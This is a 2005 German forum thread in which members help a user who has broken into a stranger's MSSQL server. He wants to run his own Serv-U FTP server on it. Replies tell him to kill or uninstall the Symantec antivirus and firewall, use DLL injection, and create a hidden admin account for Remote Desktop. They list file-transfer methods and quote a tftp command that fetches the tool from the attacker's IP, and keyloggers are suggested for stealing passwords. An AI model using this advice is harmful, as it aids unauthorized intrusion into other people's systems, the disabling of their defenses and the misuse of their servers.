MSSQL Server Mit Firewall (Software)

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von and1theReal, 12. Oktober 2005 .

Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. 12. Oktober 2005
    Hallo,

    hab hier gerade einen relativ großen und schnellen Mssql Server entdeckt. Hinter einem Router sitzt er nicht (ipconfig). Jedoch laufen ein paar Symantec Programme drauf. Wird also Norten Antivir oder so laufen haben. Hab jetzt mal probiert ein paar Prozesse zu killen, und dann meine Serv-u auf dem Port laufen zu lassen...Konnte aber dann immernoch nicht connecten...


    Gibt es da noch Möglichkeiten ?

    Pid Process Port Proto Path
    1028 svchost -> 135 TCP C:\WINDOWS\system32\svchost.exe
    4 System -> 139 TCP
    4 System -> 445 TCP
    1784 LEXPPS -> 1025 TCP C:\WINDOWS\system32\LEXPPS.EXE
    2760 alg -> 1030 TCP C:\WINDOWS\System32\alg.exe
    2480 ccApp -> 1041 TCP C:\Program Files\Common Files\Symantec Shared\ccApp.exe
    3320 ccApp -> 1048 TCP C:\Program Files\Common Files\Symantec Shared\ccApp.exe
    416 sqlservr -> 1433 TCP C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe
    0 System -> 1438 TCP
    0 System -> 1442 TCP
    5548 driverquery -> 3999 TCP c:\"meine serv-u".exe
    5548 driverquery -> 43958 TCP c:\"meine serv-u".exe

    2480 ccApp -> 123 UDP C:\Program Files\Common Files\Symantec Shared\ccApp.exe
    416 sqlservr -> 123 UDP C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe
    0 System -> 137 UDP
    0 System -> 138 UDP
    1028 svchost -> 445 UDP C:\WINDOWS\system32\svchost.exe
    4 System -> 500 UDP
    1784 LEXPPS -> 1034 UDP C:\WINDOWS\system32\LEXPPS.EXE
    416 sqlservr -> 1105 UDP C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe
    5548 driverquery -> 1434 UDP c:\"meine serv-u".exe
    2760 alg -> 1900 UDP C:\WINDOWS\System32\alg.exe
    3320 ccApp -> 1900 UDP C:\Program Files\Common Files\Symantec Shared\ccApp.exe
    4 System -> 4500 UDP
     
  2. 12. Oktober 2005
    Such den Prozessnamen bei Google und dann net stop Prozessname, oder mit kill.exe "kill antivir.exe", ohne die "". Oder schick mir den SQL mal per PN, ich kümme rmich nachher drum wenn du möchtest
     
  3. 12. Oktober 2005
    hatte gestern dsa gleiche Problem mit Symnatec Antivirus und Firewall.
    Erst als ich es gekillt UND den Rechner neugestartet hab, konnte ich drauf.
    Hab aber Symnatec per remote komplett deinstalled xD weil mich total aufgeregt hat xD
     
  4. 12. Oktober 2005
    Danke für eure Antworten:

    Wie kann ich den Server neustarten ? Geht das ?

    Wie deinstallier ich die Software ? Fällt doch aber ziemlich auf oder ?


    @Blutkehle: ICh probiers nochmal, wenn nicht melde ich mich, danke
     
  5. 12. Oktober 2005
    ist doch egal obs auffällt ^^ ich hab die firewall einfahc gefaked ;-)
     
  6. 12. Oktober 2005
    *hust* fw killen *hust* dllinjection rulz
    neustarten *rofl*

    denkst wohl auch deine servu is 31337 und den name darf keiner wissen...evtl heist sie ja meine "mine serv-u.exe"...

    mfg moep
     
  7. 12. Oktober 2005
    Ist doch mir egal ob ihr die kennt oder nicht...was fängst jetzt damit an ?

    Ist ein ganz normaler Dateiname...ja, dann ist sie halt ober 1337...

    Wollte ja nur wissen wie ich das Prob löse...

    Könnt ihr mir noch was zu "Injection" sagen, hier im Board hab ich nichts brauchbares gefunden...


    Bzw.: Wie "zerstöre" ich die Firewall ?
     
  8. 13. Oktober 2005
    deinstallen, service delete

    *hust* c++

    jenau


    mfg moep


    done closn artet aus
     
  9. 13. Oktober 2005
    Warum soll es jetzt ausarten...gnaz normaler thread...

    Hab hier noch nen andren Server bei der die FTP.exe fehlt. Möchte sie aber nicht unbedingt so hochladen, dass ich tausende von zeilen in sqlexec eingebe, also so ne bat erstelle.

    Die net.exe ist noch auf dem Server. Gibt es noch ne Möglichkeit die FTP.exe wieder herzustellen.

    Im Board finde ich nichts...
     
  10. 17. Oktober 2005
    Kann mir vielleicht einer sagen, ob es noch eine andere Möglichkeit gibt, wie tausend Zeilen einzugeben ?
     
  11. 17. Oktober 2005
    put it in a .exe => transfer => execute
     
  12. 17. Oktober 2005
    mhh...

    die ftp.exe fehlt, als kann ich ja per sqlexec ja nichts übertragen...

    Wie soll ich so was rüberlden ?
     
  13. 18. Oktober 2005
    Schreib dir ne batch datei.

    Du kannst auch ohne die scheiß ftp.exe was hochladen.

    Nehm z.B. tftp, rcp oder vb
     
  14. 18. Oktober 2005
    Hmm wenn du nicht sicher bist welcher AntiVirus drauf läuft...führe die Fport.exe aus um die Port Nummer rauszufinden.

    Wenn du die hast führe kill.exe aus zum beispiel kill.exe 444 um den AntiVir zu killen....
     
  15. 18. Oktober 2005
    dir c:\ftp.exe /S

    da wirste zu 75% noch nen paar weitere ftp.exes finden (\dllcache oder sonstwo)

    gibt sql_exec versionen, bei der man mehrere zeilen eingeben kann. wer sucht der findet
     
  16. 18. Oktober 2005
    also gesucht hab ich schon...ftp.exe nirgends mehr vorhanden...

    ,,dann werd ich mir wohl die von dir genannte sqlexec version suchen müssen...

    Ist tftp nach der MEthode sicher ?

    "Jetzt Sqlexec starten und wieder auf den Sql Server connecten. Jetzt geben wir folgendes ein:

    tftp.exe Deine IP get serv-u.exe c:serv-u.exe..."

    Kann ich da keinen pub nehmen ?
     
  17. 19. Oktober 2005

    1.) osql raw qry ownz

    transfermethoden
    2.) mshta
    3.) get
    4.) net.exe
    5.) dameware
    6.) netbios
    7.) remoteget
    8.) inline transfer
    9.) iexplore.exe

    ;-)


    bzw
    ja mit inline transfer
     
  18. 21. Oktober 2005
    Hi, hab hier nen Mssql Server mit SoftwareFirewall:

    Folgende Prozesse laufen:

    AOL Connectivity Service
    AOL TopSpeed Monitor
    Ati HotKey Poller
    Automatic Updates
    COM+ Event System
    Computer Browser
    Creative Service for CDROM Access
    Cryptographic Services
    DHCP Client
    Distributed Link Tracking Client
    DNS Client
    Error Reporting Service
    Event Log
    Fast User Switching Compatibility
    Help and Support
    IAA Event Monitor
    Indexing Service
    iPod Service
    IPSEC Services
    ISSVC
    LexBce Server
    Machine Debug Manager
    MSSQLSERVER
    Network Connections
    Network Location Awareness (NLA)
    Plug and Play
    Print Spooler
    Protected Storage
    Remote Access Connection Manager
    Remote Procedure Call (RPC)
    Secondary Logon
    Security Accounts Manager
    Server
    Shell Hardware Detection
    Symantec Core LC
    Symantec Event Manager
    Symantec Network Proxy
    Symantec Settings Manager
    Symantec SPBBCSvc
    System Event Notification
    System Restore Service
    Task Scheduler
    TCP/IP NetBIOS Helper
    Telephony
    Terminal Services
    Themes
    Upload Manager
    WAN Miniport (ATW) Service
    WebClient
    Windows Audio
    Windows Management Instrumentation
    Windows Time
    Windows User Mode Driver Framework
    Wireless Zero Configuration
    WMDM PMSP Service
    Workstation


    Gestoppt hab ich bis jetzt Norten AntiVirus:

    The Norton AntiVirus Auto-Protect Service service is stopping.


    ccApp.exe läuft laut fport noch...

    wie stopp ich ccapp.exe mit net stop ... oder war das scon der "protect service" ?


    Was muss ich noch killen bzw. beenden damit ich draufkomme ?
     
  19. 22. Oktober 2005
    ...bzw kann ich die firewall deinstallieren ?
     
  20. 23. Oktober 2005
    ja, kannste schon. eventuell . nimm remote desktop (vorher noch neuen account mit adminrechten machen), einloggen, add/remove hardware ^^

    aber bissl auffällig isses schon, wa deswegen würd ich ma von av deinstallieren abraten und lieber versuchen, den zu knacken, ohne die AV gleich zu deinstallen.

    gib mal ipconfig /all ein, wenn irgendwas mit 192.168.x.x steht, kannste drauf gehen, dass sogar noch n router dazwischen is und dann wirds noch komplizierter, nen richtig funzenden stro zu bekommen..
     
  21. 23. Oktober 2005
    oder 10.x.x.x oder 172.x.x.x
     
  22. 23. Oktober 2005
    *kopfkratz* *verwirrt* *hilfeeee*
    Er fragt wie man die FW loswird und du sagst dass man die AV??! bei Add/remove HARDWARE deinstallieren kann..

    Sinn?

    PS: seit wann ist ne Software-Firewall Hardware oder nur weil sie so "hart" ist und alles aufhalten kann??
     
  23. 23. Oktober 2005
    ja erstmal lol...

    also bei software firewall dllinjection
    bei hardware einfach z.b. n service vom admin kicken was andres drauf...admin wundert sich..loggt sich ins menü ein..mit pw..(ihr habt keylogger) habt das pw aktiviert ports...seid glücklich..mfg moep
     
  24. 23. Oktober 2005
    lol, bin bissl durch den wind. meine natürlich FW und nich AV und natürlich add/remove programs

    sorry für die verwirrung.
     
  25. 23. Oktober 2005
    also ...dann muss ich wohl noch weiter probieren mit dem killen bis was funzt oder mich mal mit djjinjection beschäftigen...


    Habt ihr mir zu dem Thema dllInjection noch ein paar Tipps bzw Links ?

    Router ist keiner dabei, hab ich schon geschaut...
     
  26. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.